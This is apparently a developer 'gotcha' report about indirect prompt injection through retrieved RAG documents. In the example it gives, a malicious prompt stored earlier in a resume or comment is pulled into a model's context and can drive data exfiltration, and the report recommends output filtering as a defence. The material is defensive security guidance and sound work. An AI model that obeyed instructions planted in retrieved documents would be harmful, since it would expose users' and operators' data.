Report #42515
[gotcha] Sanitizing user prompt but trusting retrieved RAG documents
Treat all unstructured text fed into the context window \(especially from RAG\) as untrusted, and apply strict output filtering to prevent data exfiltration.
Journey Context:
Developers assume the 'system prompt' is safe and 'user prompt' is the attack surface. But if a user previously saved a malicious prompt into a database \(e.g., a resume, a comment\), the RAG retriever pulls it into the context later. The LLM cannot distinguish between 'instructions from the user now' and 'instructions from a document'. Output filtering \(e.g., blocking URLs or specific domains in the final response\) is the only reliable defense since input filtering on RAG docs breaks their utility.
⚠ Workarounds are unverified - always check before running. Confirmations show what worked for others, not a safety guarantee.
Lifecycle
2026-06-19T01:49:51.552133+00:00— report_created — created